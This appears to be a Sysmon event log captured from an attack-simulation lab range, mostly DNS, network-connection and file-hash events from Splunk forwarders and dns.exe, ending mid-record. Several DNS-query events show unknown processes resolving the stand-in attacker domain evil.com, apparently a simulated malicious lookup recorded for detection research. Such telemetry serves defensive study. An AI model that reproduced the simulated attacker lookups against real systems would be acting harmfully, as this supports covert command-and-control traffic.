14:21:57.867{00000000-0000-0000-0000-000000000000}3140<unknown process>-udpfalsefalse127.0.0.1-51545-false127.0.0.1-53domain 354300x8000000000000000217974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.867{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51545- 354300x8000000000000000217973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.866{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51545- 354300x8000000000000000217972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.784{00000000-0000-0000-0000-000000000000}7280<unknown process>-udpfalsefalse127.0.0.1-51544-false127.0.0.1-53domain 354300x8000000000000000217971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.784{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51544- 354300x8000000000000000217970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.784{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51544- 354300x8000000000000000217969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.784{00000000-0000-0000-0000-000000000000}7280<unknown process>-udptruefalse127.0.0.1-51544-false127.0.0.1-53domain 354300x8000000000000000217968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.783{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51543- 354300x8000000000000000217967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.783{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51543- 354300x8000000000000000217966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.783{00000000-0000-0000-0000-000000000000}7280<unknown process>-udptruefalse127.0.0.1-51543-false127.0.0.1-53domain 354300x8000000000000000217965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.783{00000000-0000-0000-0000-000000000000}7280<unknown process>-udpfalsefalse127.0.0.1-51542-false127.0.0.1-53domain 354300x8000000000000000217964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.783{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51542- 354300x8000000000000000217963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.783{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51542- 354300x8000000000000000217962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.783{00000000-0000-0000-0000-000000000000}7280<unknown process>-udptruefalse127.0.0.1-51542-false127.0.0.1-53domain 354300x8000000000000000217961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.714{00000000-0000-0000-0000-000000000000}6208<unknown process>-udpfalsefalse127.0.0.1-51541-false127.0.0.1-53domain 354300x8000000000000000217960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.714{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51541- 354300x8000000000000000217959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.714{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51541- 354300x8000000000000000217958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.714{00000000-0000-0000-0000-000000000000}6208<unknown process>-udpfalsefalse127.0.0.1-51540-false127.0.0.1-53domain 354300x8000000000000000217957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.714{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51540- 354300x8000000000000000217956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.714{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51540- 354300x8000000000000000217955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.714{00000000-0000-0000-0000-000000000000}6208<unknown process>-udptruefalse127.0.0.1-51540-false127.0.0.1-53domain 354300x8000000000000000217954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.713{00000000-0000-0000-0000-000000000000}6208<unknown process>-udpfalsefalse127.0.0.1-51539-false127.0.0.1-53domain 354300x8000000000000000217953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.713{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51539- 354300x8000000000000000217952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.713{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51539- 354300x8000000000000000217951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.712{00000000-0000-0000-0000-000000000000}6208<unknown process>-udptruefalse127.0.0.1-51539-false127.0.0.1-53domain 354300x8000000000000000217950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.649{00000000-0000-0000-0000-000000000000}1848<unknown process>-udpfalsefalse127.0.0.1-51538-false127.0.0.1-53domain 354300x8000000000000000217949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.649{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51538- 354300x8000000000000000217948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.649{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51538- 354300x8000000000000000217947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.649{00000000-0000-0000-0000-000000000000}1848<unknown process>-udptruefalse127.0.0.1-51538-false127.0.0.1-53domain 354300x8000000000000000217946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.649{00000000-0000-0000-0000-000000000000}1848<unknown process>-udpfalsefalse127.0.0.1-51537-false127.0.0.1-53domain 354300x8000000000000000217945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.649{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51537- 354300x8000000000000000217944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.649{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51537- 354300x8000000000000000217943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.649{00000000-0000-0000-0000-000000000000}1848<unknown process>-udptruefalse127.0.0.1-51537-false127.0.0.1-53domain 354300x8000000000000000217942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.648{00000000-0000-0000-0000-000000000000}1848<unknown process>-udpfalsefalse127.0.0.1-51536-false127.0.0.1-53domain 354300x8000000000000000217941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.648{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51536- 354300x8000000000000000217940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.434{00000000-0000-0000-0000-000000000000}1044<unknown process>-udptruefalse127.0.0.1-51528-false127.0.0.1-53domain 354300x8000000000000000217939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.358{00000000-0000-0000-0000-000000000000}7620<unknown process>-udptruefalse127.0.0.1-51526-false127.0.0.1-53domain 22542200x8000000000000000217938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.870{00000000-0000-0000-0000-000000000000}3140evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.785{00000000-0000-0000-0000-000000000000}7280evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.716{00000000-0000-0000-0000-000000000000}6208evil.com0::ffff:127.0.0.1;<unknown process> 23542300x800000000000000044931Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:00.097{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=459C30B9827B7B638322BA76C8DED4DF,SHA256=B434C1950B6784583BCEF58AE2890DB23EF47BFA233ECE531089DD44BAB8F312,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.866{00000000-0000-0000-0000-000000000000}3140<unknown process>-udptruefalse127.0.0.1-51545-false127.0.0.1-53domain 354300x8000000000000000217986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.783{00000000-0000-0000-0000-000000000000}7280<unknown process>-udpfalsefalse127.0.0.1-51543-false127.0.0.1-53domain 354300x8000000000000000217985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.714{00000000-0000-0000-0000-000000000000}6208<unknown process>-udptruefalse127.0.0.1-51541-false127.0.0.1-53domain 23542300x800000000000000044932Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:01.190{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B0AEC6E06392983AB430BC4D636442A,SHA256=950ECECEB283ABF71EE702569620B29B82C7B7EFC2D08A93FC3669B85083C826,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:00.768{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56431-false10.0.1.12-8000- 23542300x800000000000000044935Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:02.768{0A5DF930-E35C-6299-1200-000000006002}1004NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=771BC975C228B172986D8E01E0319A95,SHA256=D92A59AABC1AF1A5E069E56CC3D587AD6BF8CBA69E7A74DA3C44373DF8E0ED51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044934Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:02.284{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E12E805A8E651087D7B0A3625F503E27,SHA256=C8FF16226CC9341906D5725F7263FC6676024FA465FB5AB4C5ED3BB3B3755DEF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044933Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:59.743{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52390-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000217990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:03.772{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EA159D52D525F432EA88E20861E18A7,SHA256=69AB3FD780CE8B56670DADBC68720B492508B37210BEECD109C5C2C135A17C5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:03.256{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\datareporting\glean\db\data.safe.binMD5=22827B1FCC748CFC100466818140C496,SHA256=6682BC8BC92246FF27FE1CDB65CBF73EACF1260FD315EC752BAB6CB6A4710AF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044936Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:03.378{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60DC5A8B297E42F28F48AE2928F29992,SHA256=0014BE96BF1D0C337C0BA700078CD1E960C0AB02EF908317B3E12B24B3BE4ABD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:04.611{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C04215382AA4108BAC26C9EA84FD513,SHA256=C8A8844D547CD330F63E5536FC4336CBF2BFB89ACA210C0CDEB39D898228976B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044938Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:04.472{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4F6CF8D2E3F396B78556D5D281EEA10,SHA256=8DFB61011E7DBB0C63E512C7A2A4F641CD137CEDE38B70D11112B2D49E3FFEA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044937Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:04.268{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=88764E49A9DB40FAC84C143D55B11D16,SHA256=B6040902613D67A5E021D6B0ACAF400FECE55CE1FD86E9E8FC5C745130E83807,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044940Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:05.565{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FBC0508CD3AD6F64605ACDA66262D04,SHA256=06DA4B6B4117C930B4A5C98EFFD7D3D96275A72642F57E1E2A883F39D35E5439,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044939Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:03.820{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52391-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x800000000000000044941Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:06.550{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E469491F6DD029CCD1887F7FA2BD7D86,SHA256=D43D9E3B1C60D443642B630DF0AED807B2B4D048A8B6991B48F45CCB938D0E29,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:05.776{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56432-false10.0.1.12-8000- 23542300x800000000000000044943Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:07.643{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5729AE24D7BEE721794D7D45AFED58D4,SHA256=CD17CA6481056542C2620B05B1E0A9CB6723D4EB1BC8C045A37BB5C86752FA32,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044942Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:04.773{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52392-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044944Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:08.737{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=510B5FA8E31C95FBE7FFC6ACD6C405EA,SHA256=EA8BCF1D3D09E3710318345124A1DE305B6F1CBFA78EAD79CB82BD64A4C10AA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044945Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:09.831{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17079E089261315D746022D7F402330B,SHA256=686F068E0BECA4F024165722572D078314D2416DA8CE6F22A64E1AC8670C41A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044946Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:10.925{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5EDA2B567B1E5D0A945E6564BBD23C5,SHA256=824EACDF6083F38621F536645D070705FEC1FE1669FCEADC4EBA843F5541CFD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:11.481{2E1864BB-E14E-6299-2800-000000005F02}2976NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-082954c374d9e9807\channels\health\respondent-20220603102417-231MD5=D22CF257E0732B5F4C22EC786659B3FF,SHA256=CD985CCC34CF20D24C2A0DD6C1AF3F982A03CB86FB6AC67C5C7E1BD670546944,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:10.858{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56433-false10.0.1.12-8000- 23542300x8000000000000000217994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:12.494{2E1864BB-E14E-6299-2800-000000005F02}2976NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-082954c374d9e9807\channels\health\surveyor-20220603102414-232MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044948Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:10.632{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52393-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044947Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:12.018{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E0585B9509715F79889564A18121206,SHA256=AECCA1E12CAF8D315ADA1B76CD2FDB478111F4CF4D1E371337B5EBDDD653C62A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044949Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:13.112{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5736D54D3922A8CCEC44F70D29ABA999,SHA256=7D8F95102FBAC35C3C26277093FFEB2EB80E080ED3C247C9E00000497AAC3279,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044950Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:14.206{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C2FBF391C7AC64D04688D919D1BAF76,SHA256=8DDF7FF865A6BCF98E4285DD2E5009A8435E0C33CA1D8AFFBDC717E0397CD95A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044951Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:15.300{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32928F1D09D6C833BFFA2188B5CCEF4B,SHA256=21996621AD08CDC959B21C8BA6BFC97DDF07AF2F5073C3229E76AD893574826D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044952Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:16.393{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=674F19619CDAB8147F4CBD9178129883,SHA256=2361803C56EF7F8615315D03F94978B19F57EA3D9E7119B15880BA6C5385CE8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:17.963{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=41249E389EBB9AB4A10B4E4387776252,SHA256=4FBCFC7BCDC59FFAFD57E8603ED94325C8056DA54672D15305637E75A6C63DD1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:17.316{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-1919-629A-2F47-000000005F02}7980C:\Program 